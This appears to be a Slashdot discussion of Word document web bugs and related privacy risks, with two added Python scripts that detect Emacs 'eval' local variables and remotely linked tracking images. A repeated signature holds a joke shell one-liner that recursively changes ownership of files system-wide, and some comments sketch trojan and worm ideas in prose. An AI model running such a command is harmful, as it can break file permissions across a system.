      I guess that I must have been hallucinating when I saw the comp.risks posting describing Emacs executing arbitrary lisp code in a document, then. And the other comp.risks posting, six years later, describing exactly the same thing.

      Don't feel bad; most people don't know that Microsoft isn't creating new risks, they're just duplicating the stupidity of GNU a decade earlier.

    6. Re:Emacs too by ianezz · · Score: 1
      but in order to be analogous to a Word macro virus, wouldn't emacs have to automatically execute the contents of the file without my direction to do so?

      Premise: default values in GNU Emacs regarding the subject are reasonable - so IMHO it's not a problem at all (and it hasn't been in the past, indeed).

      Search the GNU Emacs documentation for "Local variables", which are completely safe, except for the "eval" construct.

      The default behaviour for Emacs is to show you the code in the eval construct and ask for confirmation. You may change the default behaviour using M-x customize-variable enable-local-eval.

      In order to confirm you have to manually type "yes" followed by "Enter", while "no" is the default answer.

      So, to give a brief answer: Emacs, by default, doesn't execute the content of a file when it's opened without explicit directions to do so.
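An added example, not part of the thread: a file can be checked for the two places Emacs reads file-local variables from, the `-*- ... -*-` line at the top and the "Local Variables:" list near the end, before it is opened. The Python sketch below reports each entry and marks `eval` entries, the one construct the comments above single out; function names and the trailer sample are constructed, and the first sample is the line quoted earlier in this thread.

```python
import re

# Emacs looks for the trailing list only near the end of the file.
TAIL_CHARS = 3000
# Marker assembled from two pieces so this source file does not itself
# contain something that looks like a variable list.
MARKER = "Local " + "Variables:"


def _first_line_vars(text):
    """Entries from a '-*- name: value; ... -*-' cookie."""
    lines = text.splitlines()
    if not lines:
        return []
    # A '#!' interpreter line pushes the cookie down to line 2.
    use_second = lines[0].startswith("#!") and len(lines) > 1
    line = lines[1] if use_second else lines[0]
    m = re.search(r"-\*-(.*?)-\*-", line)
    if not m:
        return []
    body = m.group(1).strip()
    if ":" not in body:                      # '-*- C++ -*-' names a mode only
        return [("mode", body)] if body else []
    pairs = []
    for part in body.split(";"):
        name, sep, value = part.partition(":")
        if sep and name.strip():
            pairs.append((name.strip().lower(), value.strip()))
    return pairs


def _trailer_vars(text):
    """Entries from the trailing list, honouring its comment prefix/suffix."""
    lines = text[-TAIL_CHARS:].splitlines()
    for i, line in enumerate(lines):
        m = re.search(re.escape(MARKER), line, re.IGNORECASE)
        if not m:
            continue
        prefix, suffix = line[:m.start()].strip(), line[m.end():].strip()
        pairs = []
        for entry in lines[i + 1:]:
            s = entry.strip()
            if not s.startswith(prefix):
                break
            s = s[len(prefix):]
            if suffix and s.endswith(suffix):
                s = s[:-len(suffix)]
            name, sep, value = s.partition(":")
            name = name.strip().lower()
            if not sep or name == "end":
                break
            pairs.append((name, value.strip()))
        # Scanner choice: entries are reported even if 'End:' is missing.
        return pairs
    return []


def audit(text):
    """List every file-local entry and whether it asks Emacs to run Lisp."""
    findings = []
    sources = (("first-line", _first_line_vars(text)),
               ("trailer", _trailer_vars(text)))
    for where, pairs in sources:
        for name, value in pairs:
            findings.append({"where": where, "name": name,
                             "value": value, "runs_lisp": name == "eval"})
    return findings


def needs_review(text):
    return any(f["runs_lisp"] for f in audit(text))


SAMPLE_COOKIE = "// -*- mode: C++; tab-width: 4 -*-\nint main() { return 0; }\n"
SAMPLE_TRAILER = (                      # constructed sample
    "(defun demo ())\n"
    ";; " + MARKER + "\n"
    ";; tab-width: 8\n"
    ';; eval: (message "constructed sample")\n'
    ";; End:\n"
)

if __name__ == "__main__":
    for sample in (SAMPLE_COOKIE, SAMPLE_TRAILER):
        for finding in audit(sample):
            print(finding)
```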

    7. Re:Emacs too by TummyX · · Score: 1

      And office always warns you when you open a document that contains a macro.

      obviously anything that has scripting capabilities (like bash/ksh) can do dangerous things. depends on who you're logged on as, and your permissions as to how dangerous it can get.

      it's not news that documents with scripts (or scripts themselves) can be dangerous if you don't know what you're doing. and office warns you about them.

      you all complain about windows holding peoples' hands. then you complain about this. it is just ridiculous.

      i suppose windows should not allow users to run any exe?

  37. Re:This isn't much different than Web Pages alread by catkinson · · Score: 1


    woops! yeah i know preview ... that should be policetechbot.com

  38. Now I'm starting to get paranoid. by the_other_one · · Score: 1

    I just hope this feature never makes it into Star Office or WordPerfect.

    I guess it will never be safe to use a Microsoft Product to open a document created with a Microsoft Product.

    I wonder if my text files created with notepad might be bugged.

    --
    134340: I am not a number. I am a free planet!
    1. Re:Now I'm starting to get paranoid. by cowbutt · · Score: 1

      It's already in StarOffice 5.2! (dunno about previous versions - probably them too...)

  39. On the topic of web bugs by AbbyNormal · · Score: 2

    Question: has anyone heard of Wild tangent? My router the other day started connecting to a website "update.wildtangent.com" out of the blue when I launched win98. I found the directory "wt" in windoze and uninstalled it. Funny thing is, I never agreed to install it AND after I did remove it IE slowed down A LOT when changing btw open windows. Just curious, because this seemed to be related to M$.

    --
    Sig it.
    1. Re: On the topic of web bugs by fireproof · · Score: 2
      From their FAQ (See it here . . .):

      Who is WildTangent?
      Former Microsoft Multimedia evangelist and DirectX creator, Alex St. John, and his partner Cambridge mathematician Jeremy Kenyon founded WildTangent Inc. in June 1998. WildTangent pursues the vision of building a richer more communicative Internet experience through the use of 3D graphics, sound, animation, and interactivity.

      and

      How did the web driver get installed on my system?
      Our web driver provides advanced multimedia capabilities to your web browser. It was installed by a product that needed its services, such as one of our music visualizers, screensavers, or games. It could also have been installed when you visited a web page or by a third party product. In all cases, the web driver announces its installation through a series of licensing screens. If you missed this information, you can view our license agreement or our privacy statement.

      -------

      --

      /* "A fool does not delight in understanding, but only in revealing his own mind." */

    2. Re:On the topic of web bugs by evand · · Score: 1
      Question: has anyone heard of Wild tangent? My router the other day started connecting to a website "update.wildtangent.com" out of the blue when I launched win98.
      It looks like your copy of Windows 98 had the WildTangent "3D Streaming Technology" plugin installed. My guess is that the plugin checks for updates of itself whenever IE is launched (or, in this case, IE is launched because it is tied to the OS which was starting...).

      Not saying that the fact that WildTangent was installed without you knowing was a good thing, or that it contacting update.wildtangent.com without your permission was a good thing, either. Just an explanation.
    3. Re:On the topic of web bugs by TheReverand · · Score: 2

      Actually they make plugins for winamp among other things. But of course I'm sure MS forced you to install it. I have an idea, why don't you start a class action suit? That way you can get past all the pain and suffering you were caused when you found that evil wt folder on your harddrive.

    4. Re:On the topic of web bugs by AbbyNormal · · Score: 1

      The FAQ posted by Fireproof actually gave me a clue...going to check out the Control panel for that sucker.

      The update actually did not occur UNTIL winbloze98 finished loading. The scary thing as you pointed out is that I NEVER allowed it to install on my system. Problem solved though, just banned update.wildtangent.com until I find out more.

      --
      Sig it.
    5. Re:On the topic of web bugs by Fas+Attarac · · Score: 2

      Umm, what's the big deal?

      It came installed with something you installed on your system. If you're the type that habitually ignores license screens and just blindly clicks Next when you install stuff, you deserve what you get.

      Are you really that concerned that this piece of software is contacting an updates server? Do you have any idea how much software nowadays does this sort of thing? Why is it everyone considers a piece of software that, behind the scenes, checks to see if there are updates of itself an "evil" piece of privacy-invading software? It just seems silly to go through the effort of setting up things like firewall filters just because you don't "trust" what this piece of software is doing. If you really don't trust it, why the hell are you installing it? If you're going to say, "But I didn't know I was installing it!", something else you apparently do trust did install it, so perhaps some trust relationships there need to be looked at.

    6. Re:On the topic of web bugs by knarf · · Score: 1
      Are you really that concerned that this piece of software is contacting an updates server? Do you have any idea how much software nowadays does this sort of thing? Why is it everyone considers a piece of software that, behind the scenes, checks to see if there are updates of itself an "evil" piece of privacy-invading software?

      Are you REALLY sure that that 'updates' server is only there to 'update' the software on your computer? And wouldn't you want to know what those 'updates' exactly are? Assuming you read the license before clicking 'yes' or 'finish' to let the installer do its thing (if there even WAS an explicit confirmation before the software got installed on your system), you agreed to have the installer install a certain piece of software on your box. Now what if the 'update' turns that piece of software into a completely different piece of software, one which you NEVER would agree to having it installed on your system. The 'update' does not ask you for confirmation, it just does its thing. And if you read the license, it probably does not contain any safeguard against this.

      So, NO, I'd rather update my software myself, or have a competent sysadmin do it. That way, at least we know what is around on the system, and we know how it got there.

      --
      --frank[at]unternet.org
    7. Re:On the topic of web bugs by Kronovohr · · Score: 1

      Actually, if I just downloaded sendmail 10.2.1 and started showing connections going to sendmail.com, I'd shit myself. Not so much because of the privacy issues, but remember how many of these "hidden features" have caused some serious problems as far as security goes? Now, taking for granted that some software applications do check for updates via the web. So what? Well, as evidenced by the recent DNS hijackings of www.nike.com and other moderately high-scale websites, it would be possible (not altogether trivial, mind you, but still highly possible) that someone could hijack the DNS of an update page and ship it over to www.evilhost.net to run a CGI script that would respond with "hey! you need to upgrade!" Since most people would be totally unaware of the server being incorrect, they would grab the update, and wham! you've just installed a trojan. Tough shit, that's what you should expect from software in the internet world, right? I'd sure as hell hope not.

      In a return to the issue at hand, yes, it's a well known fact that Word can use URLs for objects. These can also be tinkered with to produce some nasty results. There have been a few incidents (usually practical jokes) that do illustrate this, but why should a standard document be connecting to the internet for anything? Unexpected behavior can really cause havoc if someone who likes the idea of these "e-mail viruses" and other destructive code finds a way to do some real damage.

    8. Re:On the topic of web bugs by Robert+S+Gormley · · Score: 2

      You probably installed one of many winamp plugins which use it... - nothing really to do with MS

      --

      Open Source. Closed Minds. We are Slashdot.

    9. Re:On the topic of web bugs by sg_oneill · · Score: 1

      The wild tangent plugin is sending off your GPS co-ordinates (Inferred by triangulating your Windows CD-KEY code with your serial number on your Pentium and your shoe size), so as to correctly aim the new Masonic Mind control Satellite network.

      --
      Excuse the Unicode crap in my posts. That's an apostrophe, and slashdot is busted.
    10. Re:On the topic of web bugs by Fas+Attarac · · Score: 2

      Are you REALLY sure that that 'updates' server is only there to 'update' the software on your computer?

      Again, if you do not trust the software you're running on your computer, why did you install it in the first place?

  40. This also happens in spam..... by blogan · · Score: 3

    I've noticed some spam that would try to fetch a graphic from a website. They track your address in the image location so they know who's getting it and who isn't. We need a backwards firewall to prevent traffic like this from leaving.....

  41. Another fun feature... by bsletten · · Score: 2

    Is the versioning information that is often stored in Word documents. This allows "template" documents like contracts, offer letters, etc. to become sources of "extra" data if the originator starts with an existing version and overwrites it! This happened with me once. A co-worker got a copy-and-overwritten offer letter that had my specifics in it when he viewed it under vi.

    MORAL: Always start from clean documents (or turn the versioning off if you can)

    1. Re:Another fun feature... by jesser · · Score: 1
      MORAL: Always start from clean documents (or turn the versioning off if you can)

      Better yet, Moral: use a format that you can edit with a text editor, and edit it with a text editor.

      (If you're stuck with MSWord, I think the versioning feature is called "fast save", because it works by appending new and changed parts of the file when you save it instead of rewriting the entire file each time it is saved. Open in notepad to check before sending if you're paranoid.)

      --

      --
      The shareholder is always right.
    2. Re:Another fun feature... by psicE · · Score: 1

      It's not the official Microsoft versioning feature, which you can enable separately. Technically someone could build a program based on fast save that could delete each layer one by one and "turn back the clock", but the real MS Word versioning feature is more advanced. Not that that's a good thing -]

    3. Re:Another fun feature... by EyesOfNostradamus · · Score: 1
      Technically someone could build a program based on fast save that could delete each layer one by one and "turn back the clock"

      I've heard that it was as easy as opening the document and repeatedly clicking undo..., no special program needed... Sorry, I cannot doublecheck it though, as I'm at home right now, on a Linux box ;-)

    4. Re:Another fun feature... by psicE · · Score: 1

      Never worked right for me... I meant after you saved. For some reason, after you save a Word document (I think) it clears the Undo history, and obviously after you quit you can't Undo anymore. I meant with Fast Save you could theoretically send a document to someone and then they use a tool and undo it to see the very first draft of it.

  42. Seems like they're reaching. by Kupek · · Score: 1
    Don't get me wrong, I certainly don't like it, but this is what happens when you access information on the internet. I don't get the impression that Microsoft even halfway intended this to be the case. This isn't something Microsoft did on purpose, it's a byproduct of a Word document's ability to retrieve an image on a remote host.

    What Microsoft should do is allow users to disable a document from retrieving any information from a remote host, not just images. They already do this with macros, since everyone knows how dangerous they can be.

    This just doesn't seem like it was intentional on Microsoft's part. They fucked up by not allowing users to not retrieve images, but it seems like the Privacy Foundation is reaching a bit. It's definitely a privacy concern (tracking "confidential" documents especially), but keep in mind that the entire thing is all hypothetical. This just makes a Word document about as safe as your average web page you run across.

  43. Here's a solution to keep it from happening by Molina+the+Bofh · · Score: 2

    I use a firewall, which, by pure coincidence, registered today. It's Zone Alarm Pro and they have a [less featured, but functional] free for personal use. It's a very good one, IMO, as it detects when a program opens the winsock, and asks you if you should let that program access the net. It can remember your choice. I recommend it.

    So I got curious to see how it'd react to this. Downloaded the demo document from the article and, after opening the document, it told me Word was trying to access it.

    I simply didn't allow word to access the net (word was trying to contact 127.0.0.1, probably to IE).

    As I didn't grant access to word, it logged:
    ACCESS,2000/08/30,16:50:12 -3:00 GMT,WINWORD.EXE was temporarily not allowed to connect to the Internet (127.0.0.1).,N/A,N/A
    and the bug didn't work.

    --

    -
    Roses are #FF0000, Violets are #0000FF, find / -name '*base*' |xargs chown -R us && mv zig greatjustice
    1. Re:Here's a solution to keep it from happening by Luminous · · Score: 1
      I too just recently started using Zone Alarm and have discovered all sorts of apps I have been running want to access the internet. I deny everything that shouldn't be using the internet (like Word) and haven't yet run into any problems.

      But in a company setting...I wonder how far this thing could go? I am tempted to create a bunch of documents just to implement a bug tracker in them.

      --
      This is not the way to build a lasting empire.
    2. Re:Here's a solution to keep it from happening by Nightbane · · Score: 1

      This does work but only if you have ZoneAlarm installed on that computer.

      I for example have ZoneAlarm installed on a computer that is being used temporarily(sp?) for a router. If I accessed a Word document with this bug on another computer connected to my network it wouldn't detect the local connection request (127.0.0.1). It would then let it pass through since it (the router) would see the request as coming from IE, which unfortunately I have enabled since I can't stand netscape.

    3. Re:Here's a solution to keep it from happening by Molina+the+Bofh · · Score: 1

      Zone alarm is a personal firewall.

      It doesn't forward packets to other machines, like other firewalls. It's to be used on the computer meant to be protected.

      As I said, it uses another concept:
      When a program on the local machine tries to open the TCP/IP stack, Zone Alarm asks you if you wish to grant access to it or not. It can remember your decision.

      If the program tries to listen to a port, ZA also asks if the program can act as a server.

      The good thing is that all trojans that listen to a socket (such as the infamous Back Orifice, Deepthroat, and all others) will be immediately detected, as you were not expecting a program to act as a server.

      It drops incoming packets that don't match your criteria, thus preventing port scan, and others.

      It is not supposed to work on a machine acting as a router. Got the concept? It's very good IMO.

      --

      -
      Roses are #FF0000, Violets are #0000FF, find / -name '*base*' |xargs chown -R us && mv zig greatjustice
  44. web bug by Anonymous Coward · · Score: 1

    Well, this web bug uses IE's proxy info. Set up IE and configure a fake proxy server. Use netscape for your real work. Each time a web bug tries to go to the internet you're prompted for a proxy password. bingo you know.

  45. Who would have thought.... by tiny69 · · Score: 3
    Who would have thought that the biggest threat to computer security would be a document? One of Office 2000's benefits is - "Web-enabled collaboration and information sharing." Link

    I can't wait to find out what other "innovation" gems are still out there.

    --
    Go not unto/. for advice, for you will be told both yea and nay (but have nothing to do with the question)
  46. Bill Gates here... by DreamingReal · · Score: 5
    Hello everybody,
    My name is Bill Gates. I have just written up an e-mail tracing program that traces everyone to whom this message is forwarded to. I am experimenting with this and I need your help.

    Forward this to everyone you know and if it reaches 1000 people everyone on the list will receive $1000 at my expense.

    Enjoy.

    Your friend,
    Bill Gates

    Damn! This was totally true and I missed out!


    -------

    --
    We want some answers and all that we get
    Some kind of shit about a terrorist threat

    - Ministry
    1. Re:Bill Gates here... by psicE · · Score: 1

      Actually, it wasn't. First, he didn't write the program; second, he's not your friend.

    2. Re:Bill Gates here... by jovlinger · · Score: 2

      bitch bitch moan moan

      informative? informative!?

      funny, that I see, but how was that informative.

      I could even give you insightful if you twisted my arm, but you have to give me a hint before I see how that was informative.

      This, this post is cranky. I'm hungry and I like to take it out on ... you.

    3. Re:Bill Gates here... by Jose · · Score: 1

      now I'm just waiting for the Good Times Virus to come true...

      I'm sure MS has a team working on it.

      --
      The basic sleazeware produced in a drunken fury by a bunch of UCBerkeley grad students was still the core of BIND. --PV
  47. Re:Pr0n by Ribo99 · · Score: 1

    Excuse ME?/??
    Offtopic???

    Are you SMOKING CRACK?????


    ---

    --
    I wear pants.
  48. That's not the half of it. by TheDullBlade · · Score: 3

    They don't know the difference between an app and a document.

    A=B=C -> A=C

    It logically follows that they don't know the difference between a document and an OS. There is further practical proof of this from the way you can open configuration windows from their help files.

    Ergo, the next version of MS-Windows will be called MS-Help. Instead of CTRL-ALT-DEL to log in, you'll use F1. Every time you want to type something in, you'll need to reassure your computer that you are indeed familiar with the operation of a keyboard, and probably still be forced to repeat the "This is the space bar. This is what we call the home row." tutorial every time you reboot.

    --------

    --
    /.
  49. Yes by Rurik · · Score: 1

    Right, a Word Processor does need all the extras for its varying users, but they should at least be optional. If I want a simple processor, I can disable most everything, and have a small install. If I need a spell checker, I'll go through the Office setup and install it. If I need etc.etc. I should be able to install them separately from the main client.

  50. Catching plagiarism by jesser · · Score: 1
    In an academic setting, Web bugs might be used to detect plagiarism. A document could be bugged before it is distributed. An invisible Web bug could be placed within each paragraph in the document. If text were to be cut and pasted from the document, it is likely that a Web bug would be picked up also and copied into the new document.

    If the creator of the original article is putting web bugs in her document, (I hope) she will end up "catching" more quoting than plagiarism of her article. The resulting signal-to-noise ratio in her web server logs would make the tracking pretty useless.

    On the other hand, if it's being primarily used by graders to make sure that everything from sources that contain these things is quoted properly, there's no point in using a web bug - just insert enough invisible tags (an html example would be <b></b>) to later determine where the document came from. Then there's no reliance on the Internet at all, and people won't get paranoid about the green lights on their modems flashing every time they open up documents from certain people.

    But what if I can't remember how to spell plagiarism? If I copy the word from the Privacy Foundation article and use it in an essay, is my teacher going to suspect me of illegally copying information?

    Thank God for and formats that I can work with in text editors. And for honor codes, which mean people aren't constantly trying to figure out whether other people are cheating or not.

    --
    The shareholder is always right.
  51. excel? yes. by Alejo · · Score: 1
    Worse, Excel macros have more features and more privileges. Look for VBA.

    Not exactly THIS bug, but it would work too.

  52. Re:Software that requres net access during install by Anonymous Coward · · Score: 2

    That's why every time someone tries to fob this kind of thing off on the public, we need to make a stink about it. Joe sixpack isn't going to be interested enough in the details to realize how heinous it is until it's too late. So joe pizzabox hacker needs to find this stuff out and let the public know about it, and explain why it's a bad thing.

    The EFF or some such group should probably have a project to uncover and track such nasties.

    Subscription software is a big enough pain, without all of the other skullduggery someone like M$ is likely to get into. At the very least, software publishers should be required to disclose such things and be severely slapped if they overstep their bounds. It's one thing if you decide to allow a piece of software to do this, it's another if it does it behind your back.

    Is there some way to set up a firewall to prevent or at least alert us to such things?
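A file-level check that could alert on such documents before they are opened, as an added example that is not part of the original thread: it pulls printable text out of a file and reports images linked from remote web servers. It assumes a linked picture shows up as an `INCLUDEPICTURE` field code stored as 8-bit or UTF-16LE text, and it also covers HTML `<img>` tags; the sample bytes, host names and function names are constructed for illustration.

```python
import re
from collections import namedtuple
from urllib.parse import urlsplit

Finding = namedtuple("Finding", "kind url host has_query offset")

# Printable text runs, as the `strings` tool would extract them: 8-bit text
# and UTF-16LE text (every character followed by a NUL byte).
ASCII_RUN = re.compile(rb"[\t\n\r\x20-\x7e]{8,}")
UTF16_RUN = re.compile(rb"(?:[\t\n\r\x20-\x7e]\x00){8,}")

# Assumption: a linked picture appears as an INCLUDEPICTURE field code.
FIELD_REF = re.compile(r'INCLUDEPICTURE\s+"?(https?://[^\s"<>]+)', re.I)
# HTML mail, news posts and HTML-saved documents: <img ... src=http://...>
IMG_REF = re.compile(
    r'<img\b[^>]*?\bsrc\s*=\s*["\']?(https?://[^\s"\'<>]+)', re.I)

PATTERNS = (("word-field", FIELD_REF), ("html-img", IMG_REF))


def text_runs(data):
    """Yield (byte offset, text) for each printable run in the raw bytes."""
    for m in ASCII_RUN.finditer(data):
        yield m.start(), m.group().decode("ascii")
    for m in UTF16_RUN.finditer(data):
        yield m.start(), m.group().decode("utf-16-le")


def find_remote_images(data, allowed_hosts=frozenset()):
    """Return a Finding for every remotely hosted image the file links to.

    allowed_hosts holds lower-case host names that are expected (for example
    an intranet server) and should not raise an alert.
    """
    findings = []
    for offset, text in text_runs(data):
        for kind, pattern in PATTERNS:
            for m in pattern.finditer(text):
                url = m.group(1)
                try:
                    parts = urlsplit(url)
                    host, has_query = parts.hostname, bool(parts.query)
                except ValueError:  # malformed URL: still report it
                    host, has_query = None, "?" in url
                if host in allowed_hosts:
                    continue
                # has_query marks URLs that carry parameters, which is where
                # a per-copy identifier would travel.
                findings.append(Finding(kind, url, host, has_query, offset))
    return findings


# Constructed sample: not a valid Word file, only bytes laid out the way the
# assumption above describes (one 8-bit field code, one UTF-16LE field code).
SAMPLE_DOC = (
    b"\xd0\xcf\x11\xe0" + b"\x00" * 16
    + b"Quarterly report\r"
    + b'\x13 INCLUDEPICTURE "http://tracker.example/bug.gif?doc=42"'
    + b" \\* MERGEFORMAT \x14\x01\x15"
    + b"\x00" * 8
    + ' INCLUDEPICTURE "http://intranet.example/logo.gif" '.encode("utf-16-le")
)

# Constructed sample: an HTML message with a 1x1 image on a remote host.
SAMPLE_HTML = (
    b"<html><body><p>Hi</p>\n"
    b'<IMG width=1 height=1\n src="http://ads.example/1x1.gif">'
    b"</body></html>"
)

if __name__ == "__main__":
    hits = find_remote_images(SAMPLE_DOC, allowed_hosts={"intranet.example"})
    hits += find_remote_images(SAMPLE_HTML)
    for f in hits:
        note = " (carries parameters)" if f.has_query else ""
        print(f"{f.kind}: {f.url} -> host {f.host}{note}")
```
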

  53. Bugfix: Don't allow incoming word documents by Telcontar · · Score: 2
    Since you can assume that your own Word documents are under control (unless yet another virus has modified them in such a way that it includes those "web bugs"), you only have to despise others' documents.

    For a company, a simple fix is: don't use Word documents from outside - only accept Postscript or PDF.

    Which would be a good thing for us Lyx, LaTeX or (insert non-MS office product here) users.

    1. Re:Bugfix: Don't allow incoming word documents by scowling · · Score: 2
      It is trivial to add a web bug to a .pdf document, too. This security "feature" is not limited to Microsoft products.

      The only solution is to accept only plaintext, and to only open plaintext documents on old computers that were headed for Asset Recovery anyway, and which are not connected to the Net.

      And to never leave your home or get in the bathtub or eat anything but cabbage.
      --
      www.kitchengeek.com -- Nosh for
  54. Hmm... by Boiler99 · · Score: 1

    Hmm...access the internet to send information on who read it when...and the serial number(s) of all MS products installed too probably...I have to say, between processor serial numbers (my first option that I disable in machine BIOS' when building a new machine) and stuff like this, the word "anonymous" is going to fade from our language.

    (BTW, I do realize the software piracy checks were NOT included in this, I was just surmising as to the future of items like this)

  55. What /I/ would like to know is by TheDullBlade · · Score: 5

    Why on earth do you even need them? I mean, you (the /. team) have full control of the server, right? So why use a goofy hack like 1 pel images?

    It seems to me that it's lazy and irresponsible to require an extra http request.

    --------

    --
    /.
    1. Re:What /I/ would like to know is by jovlinger · · Score: 2

      Standard response is that they want to catch cached references (laft-alt, you know). However, I'm a bit confused as to why the image isn't cached as well, unless it is retrieved via a POST (GETs are cachable -- they're supposed to be idempotent).

    2. Re:What /I/ would like to know is by jamiemccarthy · · Score: 3
      "Jamie is a fucking liar."

      tealover, I don't see an email address for you in your user info. Because you're misquoting Hemos and saying some pretty outlandish stuff, I suppose you're just trolling. But if you'd like to talk seriously about this, please just email me and I can clear up any questions you might have.

      I don't think trying to allay your fears in posts here is going to be very fruitful. I'm not trying to silence you here, though; it goes without saying that any email discussion we'd have about this, you could feel free to post.

      Jamie McCarthy

      --

      Jamie McCarthy
      jamie.mccarthy.vg

  56. Wow. by Black+Parrot · · Score: 1

    Bugs in Word docs, eh? Well, they have bugs in everything else, so why not Word docs too?

    --
    Sheesh, evil *and* a jerk. -- Jade
  57. Actually that'd kick ass by Greyfox · · Score: 3

    You could probably hack up some magic stuff to page you when someone opens your resume, too. After all, this technique would really only be effective if you catch them in the act.

    --

    I'm trying to teach myself to set people on fire with my mind... Is it hot in here?

    1. Re:Actually that'd kick ass by EyesOfNostradamus · · Score: 1

      Even if you set it up to page you right away, you'd have to be really quick to map that IP address you get to the name of the employee, and then that name to a phone number. All that is assuming that the company does not sit behind a NAT or a HTTP proxy (same client IP for everybody...)

    2. Re:Actually that'd kick ass by Ronin+Developer · · Score: 2

      Ahhhhh..but perhaps you have the document run finger and get you all the particulars on the person who's reading your resume AND then send it to your pager.

      Great stuff if you're applying for a security position...scare them into hiring you.

      RD

    3. Re:Actually that'd kick ass by EyesOfNostradamus · · Score: 1
      finger? To a box which is probably an MS-Windows (tm) PC? I'd like to see that. A far better bet would be if you somehow sniffed out their network beforehand, and have the info that you gathered ready in a text file or a DB of your own.

      However, would a company that is so insecure as to allow such intrusive sniffing from outside be security conscious enough to adequately value your superior security skills?

    4. Re:Actually that'd kick ass by quietlysubversive · · Score: 1

      You put your real name in Word?

      weird...

      --
      ----(o)----
  58. Way to disable this? by antdude · · Score: 2

    Is there an option to disable this feature? I am unhappy with this.

    --
    Ant(Dude) @ Quality Foraged Links (AQFL.net) & The Ant Farm (antfarm.ma.cx / antfarm.home.dhs.org).
  59. List of software security problems? by harmonica · · Score: 2
    With all these reports, is there a list that says
    • what a given version of a given software package does without the user confirming it (e.g. transferring GUID's like it is the case in some versions of the Windows Media Player)?
    • what is stored in documents that you wouldn't want to be there (e.g. Word DOC files and its fast-save feature that has multiple versions of the same document stored)?
    • what is auto-executed after having been transferred to one's computer (e.g. Outlook macro features)?

    One could then simply compare the list of installed software at home or work, best with hints on how exactly to turn things off or what replacement version to install. Previewing my comment I see that I only gave MS software examples, I'm aware that they're not the only ones screwing things up ;-)
  60. Ironic by Kriticism · · Score: 1
    Back Orifice indeed....

    -Kriticism

    --

    -PARANOIA is fun. D20 is not fun. The Computer says so.

    -The Computer

  61. Yet Another Feature by ackthpt · · Score: 2
    I haven't looked for this [moderating of cookies], but typically junk like this comes enabled and the user has to:

    Find out about the feature

    Query Help for about an hour to find out how to moderate

    Find it shipped enabled and then disable it

    Probably my greatest annoyance with M$ products is this type of behavior. It usually costs me hours to find and disable all the annoying "features", particularly because M$ doesn't use the same terminology the rest of the world does, so it's non-obvious. Then the on/off button is deeply buried in a non-obvious location. There's a name for people who design things like this: a$$hole.

    Vote Naked 2000

    --

    A feeling of having made the same mistake before: Deja Foobar
  62. Will this also work ... by gotan · · Score: 2

    ... if the internet happens to be accessed via another application, namely Internet Explorer, which you expect to access the internet and thus are likely not to block?

    Because that is (according to the article and MS's statement) what actually happens.

    --
    "By the way if anyone here is in advertising or marketing... kill yourself." -- Bill Hicks
  63. It's not happening. So what? by barzok · · Score: 1
    Regarding the potential use of Web bugs to track Word documents, Microsoft said that there is no evidence that such activities are occurring
    Just because it isn't happening yet (and I stress "yet" because now that the cat's out of the bag, someone will be working on exploiting this), it shouldn't be considered a problem? Well, I guess I'll stop worrying about my blood pressure, since I haven't had a heart attack yet.
  64. So don't use Netscape by Greyfox · · Score: 2

    Or don't read your mail in Netscape. I've recently discovered VM for Xemacs, which gives me all the features I need -- POP, IMAP or direct mail, you can change your address (Handy for non-static POP accounts and my biggest complaint with PINE,) flexible address book handling, real PGP/GPG support (With a menu drop-down added in, even!) MIME handling, folders, and so forth. Plus some stuff I never had before like xfaces, which is pretty damn spiffy.

    --

    I'm trying to teach myself to set people on fire with my mind... Is it hot in here?

  65. Er, wrt PostScript and TeX/LaTeX by Greyfox · · Score: 2
    You DO realize that PostScript is a computer language don't you? If you're viewing it with safe turned on, it's slightly better, but it's still a computer language and offers all the chances to do nasty evil things with it.

    When I was playing with PostScript, I always wanted to come up with a PostScript worm that would propagate from printer to printer and once there, scan for the word "strategic" and replace it with the word "satanic." If I'd been able to figure out how to open a network socket in the language, I could have pulled it off too...

    TeX/LaTeX are also computer languages, allowing at least for conditionals and possibly looping as well (I never got THAT much into them.) They read kind of like LISP without the parentheses.

    While I'm not aware of any actual instances, the potential for mayhem is there.

    --

    I'm trying to teach myself to set people on fire with my mind... Is it hot in here?

  66. Re:No way! That is amazing! by piku · · Score: 1

    Oh that's lovely. I get flamed because I expose the idiocracy of a fanboy. Figures, THIS IS Slashdot for heavens sake...

  67. Not a real bug by Fervent · · Score: 3
    How is this a problem? Corporations for years have been tracking users opening certain files, and with the built-in features of macros and internet access in most office suites (StarOffice and WordPerfect included) isn't this the same thing?

    MS just took the next logical step. They built a feature into the application that programmers had been scripting into it for years.

    --

    - I don't care if they globalize against free speech. All my best free thoughts are done in my head.

  68. Maybe I will get that Old Navy gift certificate by Mr+Krinkle · · Score: 1

    Trip to disney world whatever I have a feeling the little creatures of the night that write all the stupid Microsoft will track this message are going to have a heyday with this thing. See we have always told you that we can track you and now if you forward this to 10k people you will get an Old Navy gift certificate. oh well me

    --
    I am 31337 or something.
  69. Somebody moderate this parent up! by Autonomous+Crowhard · · Score: 1
    This is pretty big.

    What's to stop someone from having their macro encode a little personal information into the URL? Just have a CGI script on the other end accepting the parameters and wait for the contact info, or what have you, to come flowing in.

    If you think people would be on the guard for something like this just think about all the cases where HR departments and job search facilities ask for Word versions of a resume.

    I happen to like the less bloated (older) versions of Word, but at this point I think the only safe thing to do is: Just say "no" to Word.

  70. We need more fine-grained access control by Eccles · · Score: 2

    Once again we have an example which I think points out our need for more fine-grained access control. We need to be able to limit what apps other applications may run/interface with, and we may also want a way to have inherited limits. I don't want most programs being able to send mail, I want them locked out unless I give them permission. I'm not sure of the technical details of implementing this, but if we want truly safe computers, this seems like the only way to me.

    --
    Ooh, a sarcasm detector. Oh, that's a real useful invention.
  71. yeah, there's one sure way by auto85842 · · Score: 1
    there's one sure way to disable this "feature:"

    C:\> deltree c:\progra~1\intern~1 /y

    --

    10100111101010010
    1. Re:yeah, there's one sure way by JonK · · Score: 1

      Amusingly enough, that won't work (hint: read A Moron's Guide To COM: this may help explain how the Program Files\Plus!\Microsoft Internet directory has approximately 2/3 MB of code in it)
      --
      Cheers

      Jon
  72. Ok lets try this again by piku · · Score: 1

    Last time I got flamed, so let's try again. How do you expect Word to access images that YOU linked to the web without accessing the Internet? Does Linux allow you to surf the web without being connected to the internet?

    At least it doesn't do THIS: http://linuxtoday.com/news_story.php3?ltsn=2000-08-30-022-04-SC

    1. Re:Ok lets try this again by rellort · · Score: 1

      Yes. But only the web on localhost.

      --

      -- In the future, everyone will code Perl for 15 minutes. --
  73. Re:I have just one thing to say.... by kermit+the+fraud · · Score: 1

